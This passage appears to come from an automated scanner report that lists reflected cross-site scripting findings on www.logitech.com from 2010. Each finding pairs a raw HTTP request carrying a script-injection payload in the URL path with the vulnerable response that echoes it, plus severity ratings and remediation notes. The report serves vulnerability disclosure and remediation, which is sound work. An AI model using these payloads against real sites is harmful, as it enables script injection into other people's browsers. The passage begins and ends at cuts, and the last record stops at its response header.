"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','f39bb</script><script>alert(1)</script>d0ecba208c3/349/7393' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.210. http://www.logitech.com/en-us/349/7393 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7baf1</script><script>alert(1)</script>75e1f767a3a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/3497baf1</script><script>alert(1)</script>75e1f767a3a/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3497baf1</script><script>alert(1)</script>75e1f767a3a/7393' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.211. http://www.logitech.com/en-us/349/7393 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2728"><script>alert(1)</script>459434c9ec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349d2728"><script>alert(1)</script>459434c9ec7/7393 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349d2728"><script>alert(1)</script>459434c9ec7/7393">
...[SNIP]...

1.212. http://www.logitech.com/en-us/349/7393 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd82</script><script>alert(1)</script>e46a071140c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/349/73938bd82</script><script>alert(1)</script>e46a071140c HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/73938bd82</script><script>alert(1)</script>e46a071140c' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.213. http://www.logitech.com/en-us/349/7393 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/349/7393

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec80"><script>alert(1)</script>03d57a6218f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/349/73936ec80"><script>alert(1)</script>03d57a6218f HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:41:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/73936ec80"><script>alert(1)</script>03d57a6218f">
...[SNIP]...

1.214. http://www.logitech.com/en-us/403/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe0a3"><script>alert(1)</script>28e2f5b7a20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-usfe0a3"><script>alert(1)</script>28e2f5b7a20/403/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usfe0a3"><script>alert(1)</script>28e2f5b7a20/403">
...[SNIP]...

1.215. http://www.logitech.com/en-us/403/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b783</script><script>alert(1)</script>be912242e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6b783</script><script>alert(1)</script>be912242e94/403/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','6b783</script><script>alert(1)</script>be912242e94/403' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dc
...[SNIP]...

1.216. http://www.logitech.com/en-us/403/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c68</script><script>alert(1)</script>1a12fe97229 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/40349c68</script><script>alert(1)</script>1a12fe97229/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','40349c68</script><script>alert(1)</script>1a12fe97229' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.217. http://www.logitech.com/en-us/403/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff114"><script>alert(1)</script>8d222ec8a80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/403ff114"><script>alert(1)</script>8d222ec8a80/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="403ff114"><script>alert(1)</script>8d222ec8a80">
...[SNIP]...

1.218. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c84f1</script><script>alert(1)</script>fd42d3974fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c84f1</script><script>alert(1)</script>fd42d3974fd/403/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c84f1</script><script>alert(1)</script>fd42d3974fd/403/' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.219. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 668ca"><script>alert(1)</script>a25658b7d5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us668ca"><script>alert(1)</script>a25658b7d5f/403/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us668ca"><script>alert(1)</script>a25658b7d5f/403/">
...[SNIP]...

1.220. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28e31</script><script>alert(1)</script>f910518a1de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/40328e31</script><script>alert(1)</script>f910518a1de/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','40328e31</script><script>alert(1)</script>f910518a1de/' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsur
...[SNIP]...

1.221. http://www.logitech.com/en-us/403/&legacy=1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/403/&legacy=1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40dce"><script>alert(1)</script>6a1921695be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/40340dce"><script>alert(1)</script>6a1921695be/&legacy=1 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/en-us/search?q=%60

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="40340dce"><script>alert(1)</script>6a1921695be/">
...[SNIP]...

1.222. http://www.logitech.com/en-us/434/7288 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c9ce"%3b1f5403205ae was submitted in the REST URL parameter 1. This input was echoed as 7c9ce";1f5403205ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us7c9ce"%3b1f5403205ae/434/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Set-Cookie: P_SEARCH_TEXT=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:33 GMT;path=/
Set-Cookie: LT_PRODUCT_ID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:33 GMT;path=/
Set-Cookie: CRID=;domain=.custhelp.com;expires=Thu, 12-Nov-2009 13:42:33 GMT;path=/
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us7c9ce";1f5403205ae/434/7288";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.223. http://www.logitech.com/en-us/434/7288 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81c82</script><script>alert(1)</script>86f1d1f3dd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /81c82</script><script>alert(1)</script>86f1d1f3dd1/434/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','81c82</script><script>alert(1)</script>86f1d1f3dd1/434/7288' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'D
...[SNIP]...

1.224. http://www.logitech.com/en-us/434/7288 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf76"><script>alert(1)</script>d912e138453 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us8cf76"><script>alert(1)</script>d912e138453/434/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us8cf76"><script>alert(1)</script>d912e138453/434/7288">
...[SNIP]...

1.225. http://www.logitech.com/en-us/434/7288 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c56"><script>alert(1)</script>6a0149ddc29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/43410c56"><script>alert(1)</script>6a0149ddc29/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="43410c56"><script>alert(1)</script>6a0149ddc29/7288">
...[SNIP]...

1.226. http://www.logitech.com/en-us/434/7288 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80972</script><script>alert(1)</script>fdf704983fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/43480972</script><script>alert(1)</script>fdf704983fa/7288 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','43480972</script><script>alert(1)</script>fdf704983fa/7288' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.227. http://www.logitech.com/en-us/434/7288 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/434/7288

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e846e</script><script>alert(1)</script>9bd3403eac2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us/434/7288e846e</script><script>alert(1)</script>9bd3403eac2 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

